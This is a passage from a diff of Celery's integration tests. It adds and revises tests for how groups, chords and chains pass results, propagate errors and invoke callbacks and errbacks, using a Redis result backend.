+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_count = 42
+ gchild_sig = chord(
+ (identity.si(1337), ) * gchild_count, identity.si(31337),
+ )
+ child_chord = chord((gchild_sig, ), identity.s())
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected
+ assert res.get(timeout=TIMEOUT) == [[31337]]
+
+ def test_nested_group_chord_counting_mixed(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ gchild_count = 42
+ child_chord = chord(
+ (
+ identity.si(42),
+ chain((identity.si(42), ) * gchild_count),
+ group((identity.si(42), ) * gchild_count),
+ chord((identity.si(42), ) * gchild_count, identity.si(1337)),
+ ),
+ identity.s(),
+ )
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # Wait for the result to land and confirm its value is as expected. The
+ # group result gets unrolled into the encapsulating chord, hence the
+ # weird unpacking below
+ assert res.get(timeout=TIMEOUT) == [
+ [42, 42, *((42, ) * gchild_count), 1337]
+ ]
+
+ @pytest.mark.xfail(raises=TimeoutError, reason="#6734")
+ def test_nested_group_chord_body_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_chord = chord(identity.si(42), chain((identity.s(), )))
+ group_sig = group((child_chord, ))
+ res = group_sig.delay()
+ # The result can be expected to timeout since it seems like its
+ # underlying promise might not be getting fulfilled (ref #6734). Pick a
+ # short timeout since we don't want to block for ages and this is a
+ # fairly simple signature which should run pretty quickly.
+ expected_result = [[42]]
+ with pytest.raises(TimeoutError) as expected_excinfo:
+ res.get(timeout=TIMEOUT / 10)
+ # Get the child `AsyncResult` manually so that we don't have to wait
+ # again for the `GroupResult`
+ assert res.children[0].get(timeout=TIMEOUT) == expected_result[0]
+ assert res.get(timeout=TIMEOUT) == expected_result
+ # Re-raise the expected exception so this test will XFAIL
+ raise expected_excinfo.value
+
+ def test_callback_called_by_group(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ callback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ callback = redis_echo.si(callback_msg, redis_key=redis_key)
+
+ group_sig = group(identity.si(42), identity.si(1337))
+ group_sig.link(callback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Group result is returned"):
+ res = group_sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 1337]
+ with subtests.test(msg="Callback is called after group is completed"):
+ await_redis_echo({callback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_errback_called_by_group_fail_first(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+
+ group_sig = group(fail.s(), identity.si(42))
+ group_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from group"):
+ res = group_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group task fails"):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_errback_called_by_group_fail_last(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+
+ group_sig = group(identity.si(42), fail.s())
+ group_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from group"):
+ res = group_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group task fails"):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_errback_called_by_group_fail_multiple(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ expected_errback_count = 42
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ # Include a mix of passing and failing tasks
+ group_sig = group(
+ *(identity.si(42) for _ in range(24)), # arbitrary task count
+ *(fail.s() for _ in range(expected_errback_count)),
+ )
+ group_sig.link_error(errback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from group"):
+ res = group_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group task fails"):
+ await_redis_count(expected_errback_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_children_with_callbacks(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ child_task_count = 42
+ child_sig = identity.si(1337)
+ child_sig.link(callback)
+ group_sig = group(child_sig for _ in range(child_task_count))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ assert res_obj.get(timeout=TIMEOUT) == [1337] * child_task_count
+ with subtests.test(msg="Chain child task callbacks are called"):
+ await_redis_count(child_task_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_children_with_errbacks(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ child_task_count = 42
+ child_sig = fail.si()
+ child_sig.link_error(errback)
+ group_sig = group(child_sig for _ in range(child_task_count))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain fails due to a child task dying"):
+ res_obj = group_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Chain child task errbacks are called"):
+ await_redis_count(child_task_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_with_callback_child_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ group_sig = group(add_replaced.si(42, 1337), identity.si(31337))
+ group_sig.link(callback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ assert res_obj.get(timeout=TIMEOUT) == [42 + 1337, 31337]
+ with subtests.test(msg="Callback is called after group finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_with_errback_child_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ group_sig = group(add_replaced.si(42, 1337), fail.s())
+ group_sig.link_error(errback)
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_child_with_callback_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ callback = redis_count.si(redis_key=redis_key)
+
+ child_sig = add_replaced.si(42, 1337)
+ child_sig.link(callback)
+ group_sig = group(child_sig, identity.si(31337))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ assert res_obj.get(timeout=TIMEOUT) == [42 + 1337, 31337]
+ with subtests.test(msg="Callback is called after group finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_child_with_errback_replaced(self, manager, subtests):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+
+ child_sig = fail_replaced.si()
+ child_sig.link_error(errback)
+ group_sig = group(child_sig, identity.si(42))
+
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Chain executes as expected"):
+ res_obj = group_sig()
+ with pytest.raises(ExpectedException):
+ res_obj.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after group finishes"):
+ await_redis_count(1, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ def test_group_child_replaced_with_chain_first(self):
+ orig_sig = group(replace_with_chain.si(42), identity.s(1337))
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337]
+
+ def test_group_child_replaced_with_chain_middle(self):
+ orig_sig = group(
+ identity.s(42), replace_with_chain.s(1337), identity.s(31337)
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337, 31337]
+
+ def test_group_child_replaced_with_chain_last(self):
+ orig_sig = group(identity.s(42), replace_with_chain.s(1337))
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337]
+
def assert_ids(r, expected_value, expected_root_id, expected_parent_id):
root_id, parent_id, value = r.get(timeout=TIMEOUT)
@@ -635,10 +1323,12 @@ def test_eager_chord_inside_task(self, manager):
chord_add.app.conf.task_always_eager = prev
- @flaky
def test_group_chain(self, manager):
- if not manager.app.conf.result_backend.startswith('redis'):
- raise pytest.skip('Requires redis result backend.')
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
c = (
add.s(2, 2) |
group(add.s(i) for i in range(4)) |
@@ -647,11 +1337,6 @@ def test_group_chain(self, manager):
res = c()
assert res.get(timeout=TIMEOUT) == [12, 13, 14, 15]
- @flaky
- @pytest.mark.xfail(os.environ['TEST_BACKEND'] == 'cache+pylibmc://',
- reason="Not supported yet by the cache backend.",
- strict=True,
- raises=ChordError)
def test_nested_group_chain(self, manager):
try:
manager.app.backend.ensure_chords_allowed()
@@ -812,11 +1497,14 @@ def test_chord_on_error(self, manager):
if not manager.app.conf.result_backend.startswith('redis'):
raise pytest.skip('Requires redis result backend.')
- # Run the chord and wait for the error callback to finish.
+ # Run the chord and wait for the error callback to finish. Note that
+ # this only works for old style callbacks since they get dispatched to
+ # run async while new style errbacks are called synchronously so that
+ # they can be passed the request object for the failing task.
c1 = chord(
header=[add.s(1, 2), add.s(3, 4), fail.s()],
body=print_unicode.s('This should not be called').on_error(
- chord_error.s()),
+ errback_old_style.s()),
)
res = c1()
with pytest.raises(ExpectedException):
@@ -828,8 +1516,11 @@ def test_chord_on_error(self, manager):
lambda: res.children[0].children,
lambda: res.children[0].children[0].result,
)
+ start = monotonic()
while not all(f() for f in check):
- pass
+ if monotonic() > start + TIMEOUT:
+ raise TimeoutError("Timed out waiting for children")
+ sleep(0.1)
# Extract the results of the successful tasks from the chord.
#
@@ -840,9 +1531,15 @@ def test_chord_on_error(self, manager):
# So for clarity of our test, we instead do it here.
# Use the error callback's result to find the failed task.
- error_callback_result = AsyncResult(
- res.children[0].children[0].result[0])
- failed_task_id = error_callback_result.result.args[0].split()[3]
+ uuid_patt = re.compile(
+ r"[0-9A-Fa-f]{8}-([0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}"
+ )
+ callback_chord_exc = AsyncResult(
+ res.children[0].children[0].result
+ ).result
+ failed_task_id = uuid_patt.search(str(callback_chord_exc))
+ assert (failed_task_id is not None), "No task ID in %r" % callback_chord_exc
+ failed_task_id = failed_task_id.group()
# Use new group_id result metadata to get group ID.
failed_task_result = AsyncResult(failed_task_id)
@@ -868,6 +1565,22 @@ def test_chord_on_error(self, manager):
assert len([cr for cr in chord_results if cr[2] != states.SUCCESS]
) == 1
+ @flaky
+ def test_generator(self, manager):
+ def assert_generator(file_name):
+ for i in range(3):
+ sleep(1)
+ if i == 2:
+ with open(file_name) as file_handle:
+                        # ensures chord header generator tasks are processed incrementally #3021
+ assert file_handle.readline() == '0\n', "Chord header was unrolled too early"
+ yield write_to_file_and_return_int.s(file_name, i)
+
+ with tempfile.NamedTemporaryFile(mode='w', delete=False) as tmp_file:
+ file_name = tmp_file.name
+ c = chord(assert_generator(file_name), tsum.s())
+ assert c().get(timeout=TIMEOUT) == 3
+
@flaky
def test_parallel_chords(self, manager):
try:
@@ -958,6 +1671,25 @@ def test_chord_in_chain_with_args(self, manager):
res1 = c1.apply(args=(1,))
assert res1.get(timeout=TIMEOUT) == [1, 1]
+ @pytest.mark.xfail(reason="Issue #6200")
+ def test_chain_in_chain_with_args(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ c1 = chain( # NOTE: This chain should have only 1 chain inside it
+ chain(
+ identity.s(),
+ identity.s(),
+ ),
+ )
+
+ res1 = c1.apply_async(args=(1,))
+ assert res1.get(timeout=TIMEOUT) == 1
+ res1 = c1.apply(args=(1,))
+ assert res1.get(timeout=TIMEOUT) == 1
+
@flaky
def test_large_header(self, manager):
try:
@@ -991,3 +1723,788 @@ def test_priority_chain(self, manager):
c = return_priority.signature(priority=3) | return_priority.signature(
priority=5)
assert c().get(timeout=TIMEOUT) == "Priority: 5"
+
+ def test_nested_chord_group(self, manager):
+ """
+ Confirm that groups nested inside chords get unrolled.
+ """
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chord(
+ (
+ group(identity.s(42), identity.s(42)), # [42, 42]
+ ),
+ identity.s() # [42, 42]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [42, 42]
+
+ def test_nested_chord_group_chain_group_tail(self, manager):
+ """
+ Sanity check that a deeply nested group is completed as expected.
+
+ Groups at the end of chains nested in chords have had issues and this
+        simple test sanity checks that such a task structure can be completed.
+ """
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chord(
+ group(
+ chain(
+ identity.s(42), # 42
+ group(
+ identity.s(), # 42
+ identity.s(), # 42
+ ), # [42, 42]
+ ), # [42, 42]
+ ), # [[42, 42]] since the chain prevents unrolling
+ identity.s(), # [[42, 42]]
+ )
+ res = sig.delay()
+ assert res.get(timeout=TIMEOUT) == [[42, 42]]
+
+ @pytest.mark.xfail(TEST_BACKEND.startswith('redis://'), reason="Issue #6437")
+ def test_error_propagates_from_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = add.s(1, 1) | fail.s() | group(add.s(1), add.s(1))
+ res = sig.delay()
+
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_error_propagates_from_chord2(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = add.s(1, 1) | add.s(1) | group(add.s(1), fail.s())
+ res = sig.delay()
+
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_error_propagates_to_chord_from_simple(self, manager, subtests):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_sig = fail.s()
+
+ chord_sig = chord((child_sig, ), identity.s())
+ with subtests.test(msg="Error propagates from simple header task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ with subtests.test(msg="Error propagates from simple body task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_immutable_errback_called_by_chord_from_simple(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+ child_sig = fail.s()
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from simple header task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after simple header task fails"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from simple body task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after simple body task fails"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_simple(
+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback = errback_task.s()
+ child_sig = fail.s()
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from simple header task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after simple header task fails"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from simple body task"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after simple body task fails"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+ redis_connection.delete(expected_redis_key)
+
+ def test_error_propagates_to_chord_from_chain(self, manager, subtests):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_sig = chain(identity.si(42), fail.s(), identity.si(42))
+
+ chord_sig = chord((child_sig, ), identity.s())
+ with subtests.test(
+ msg="Error propagates from header chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ with subtests.test(
+ msg="Error propagates from body chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_immutable_errback_called_by_chord_from_chain(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+ child_sig = chain(identity.si(42), fail.s(), identity.si(42))
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(
+ msg="Error propagates from header chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after header chain which fails before the end"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(
+ msg="Error propagates from body chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after body chain which fails before the end"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_chain(
+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback = errback_task.s()
+ fail_sig = fail.s()
+ fail_sig_id = fail_sig.freeze().id
+ child_sig = chain(identity.si(42), fail_sig, identity.si(42))
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(
+ msg="Error propagates from header chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after header chain which fails before the end"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ expected_redis_key = fail_sig_id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(
+ msg="Error propagates from body chain which fails before the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after body chain which fails before the end"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+ redis_connection.delete(expected_redis_key)
+
+ def test_error_propagates_to_chord_from_chain_tail(self, manager, subtests):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_sig = chain(identity.si(42), fail.s())
+
+ chord_sig = chord((child_sig, ), identity.s())
+ with subtests.test(
+ msg="Error propagates from header chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ with subtests.test(
+ msg="Error propagates from body chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_immutable_errback_called_by_chord_from_chain_tail(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+ child_sig = chain(identity.si(42), fail.s())
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(
+ msg="Error propagates from header chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after header chain which fails at the end"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(
+ msg="Error propagates from body chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after body chain which fails at the end"
+ ):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_chain_tail(
+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback = errback_task.s()
+ fail_sig = fail.s()
+ fail_sig_id = fail_sig.freeze().id
+ child_sig = chain(identity.si(42), fail_sig)
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(
+ msg="Error propagates from header chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after header chain which fails at the end"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ expected_redis_key = fail_sig_id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(
+            msg="Error propagates from body chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+            msg="Errback is called after body chain which fails at the end"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+ redis_connection.delete(expected_redis_key)
+
+ def test_error_propagates_to_chord_from_group(self, manager, subtests):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_sig = group(identity.si(42), fail.s())
+
+ chord_sig = chord((child_sig, ), identity.s())
+ with subtests.test(msg="Error propagates from header group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_immutable_errback_called_by_chord_from_group(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+ child_sig = group(identity.si(42), fail.s())
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from header group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after header group fails"):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after body group fails"):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_group(
+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback = errback_task.s()
+ fail_sig = fail.s()
+ fail_sig_id = fail_sig.freeze().id
+ child_sig = group(identity.si(42), fail_sig)
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from header group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after header group fails"):
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ expected_redis_key = fail_sig_id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after body group fails"):
+ await_redis_count(1, redis_key=expected_redis_key)
+ redis_connection.delete(expected_redis_key)
+
+ def test_immutable_errback_called_by_chord_from_group_fail_multiple(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ fail_task_count = 42
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+ # Include a mix of passing and failing tasks
+ child_sig = group(
+ *(identity.si(42) for _ in range(24)), # arbitrary task count
+ *(fail.s() for _ in range(fail_task_count)),
+ )
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
